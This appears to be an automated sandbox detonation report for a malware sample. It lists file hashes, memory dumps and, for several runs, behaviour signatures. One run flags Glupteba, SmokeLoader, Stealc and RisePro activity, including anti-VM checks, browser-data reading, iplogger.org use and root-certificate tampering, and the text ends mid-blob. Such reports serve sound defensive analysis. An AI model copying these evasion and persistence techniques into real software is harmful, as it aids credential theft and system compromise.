| SHA512 | dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8 |
memory/5504-949-0x0000000006150000-0x000000000616A000-memory.dmp
memory/5504-950-0x00000000061A0000-0x00000000061C2000-memory.dmp
memory/5504-948-0x00000000061D0000-0x0000000006266000-memory.dmp
memory/5624-952-0x0000000004E60000-0x000000000525F000-memory.dmp
memory/5616-953-0x00000000051F0000-0x0000000005ADB000-memory.dmp
memory/5276-957-0x0000000077424000-0x0000000077426000-memory.dmp
memory/6052-958-0x0000000005690000-0x00000000056A0000-memory.dmp
memory/5992-960-0x0000000003030000-0x00000000030DE000-memory.dmp
memory/5992-961-0x0000000004B80000-0x0000000004CC1000-memory.dmp
memory/748-959-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe
| MD5 | 152771d6e0ed4221a8e355a4fca9ff69 |
| SHA1 | 93137454e80e43f0df3750d225906ec2b8007df6 |
| SHA256 | 833b49211e9bbb8f1ef7d219ce88cbe4a09cbe345d4ddedc957654121e1b5890 |
| SHA512 | ca0d994e1caa0cde125971442d460b0b7e962a53d63f9354a12318f4c92d4f2f836def621d0052fbaae35a78e25e477d82b11c6fda3e51c463c00b2648f3124c |
memory/5992-962-0x0000000000400000-0x0000000002DC7000-memory.dmp
memory/5276-965-0x0000000005420000-0x0000000005421000-memory.dmp
memory/5276-966-0x0000000005490000-0x0000000005491000-memory.dmp
memory/5276-967-0x0000000000B50000-0x00000000010EA000-memory.dmp
memory/5276-969-0x0000000005410000-0x0000000005411000-memory.dmp
memory/5276-971-0x00000000054B0000-0x00000000054B1000-memory.dmp
memory/5276-970-0x0000000005460000-0x0000000005461000-memory.dmp
memory/5276-964-0x0000000005430000-0x0000000005431000-memory.dmp
memory/5276-963-0x0000000005450000-0x0000000005451000-memory.dmp
C:\ProgramData\nss3.dll
| MD5 | 3e0c5d0dfe8abc71d8609b02dba39169 |
| SHA1 | 038e1207a7dd0c13f64204d9466fbafa8fbc08cb |
| SHA256 | 7fd2d86e40a224c67a783dfc6353ce20c559fe4cb6a899b2875c0ec8d97d0f41 |
| SHA512 | cb58530108a7fd9b0e4db1814c3e1cd775daa3251aa3f6cf4015f3cdcfba09768273b3fae6f64b0ee6719d8fd17122910d3821aa938b161a5954371ecc1c625b |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe
| MD5 | cca3175dba7648f10895bb99c11b6394 |
| SHA1 | 625cacf8b58b19ddd5049f8723f274950c785bad |
| SHA256 | ff704a31275e79462345bffc921dde315b28063a91f38078fc8d22d1a4cb4163 |
| SHA512 | 6dbe0cdd72951efe0b13654c2f729032c2c147b9aefd4d317b3c5f5b777103499fec336661daeed157fcaed670f7bb12212ed542f92917ae85524d464b8ca1fd |
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
| MD5 | 544cd51a596619b78e9b54b70088307d |
| SHA1 | 4769ddd2dbc1dc44b758964ed0bd231b85880b65 |
| SHA256 | dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd |
| SHA512 | f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719 |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 56ad05be3bda3d911af8fed7b8c66949 |
| SHA1 | ac65e8b3b3a80b1d99d556aac45a0f361f439130 |
| SHA256 | c39b724f1c4776b68ce3940e0481490d25d18f8924d20ac083a28a3378b06aeb |
| SHA512 | 449e7c27d418fb9daaae0194e065fe873ab42e8d7da03771baa5864725c49d2a685e8ef8418398619ccaa51ae705ed86885c16c40e3a96eb0b6b38f3d5f8cdb0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\_metadata\verified_contents.json
| MD5 | f7f0462b05d4eea341c565ccd96a8b63 |
| SHA1 | 15ed215063cfec11b5ab937258ebe2617295e651 |
| SHA256 | 40a0de2bcceb97b08a8804ffd7d348dac07e15bce3d042fe2c7a315ea656f73f |
| SHA512 | bd905485f5963c737ef26ac05118e4a32a85365cbfc05d7cb465644e321a3930e0458a8e5801e7572cc3456fbcf836750db7dc6a088ff2f4fb4d1a08be551abe |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
| MD5 | a5ce3aba68bdb438e98b1d0c70a3d95c |
| SHA1 | 013f5aa9057bf0b3c0c24824de9d075434501354 |
| SHA256 | 9b860be98a046ea97a7f67b006e0b1bc9ab7731dd2a0f3a9fd3d710f6c43278a |
| SHA512 | 7446f1256873b51a59b9d2d3498cef5a41dbce55864c2a5fb8cb7d25f7d6e6d8ea249d551a45b75d99b1ad0d6fb4b5e4544e5ca77bcd627717d6598b5f566a79 |
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
141s
Max time network
157s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1252.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
134s
Max time network
156s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1253.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
131s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Resource\resources.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240215-en
Max time kernel
119s
Max time network
125s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\rundll32.exe | N/A |
Processes
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\bentonite.png
Network
Files
memory/2880-0-0x0000000001E50000-0x0000000001E51000-memory.dmp
memory/2880-1-0x0000000001E50000-0x0000000001E51000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240221-en
Max time kernel
31s
Max time network
153s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\rt1S04Jegwg5fVerEbHNeyXS.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80b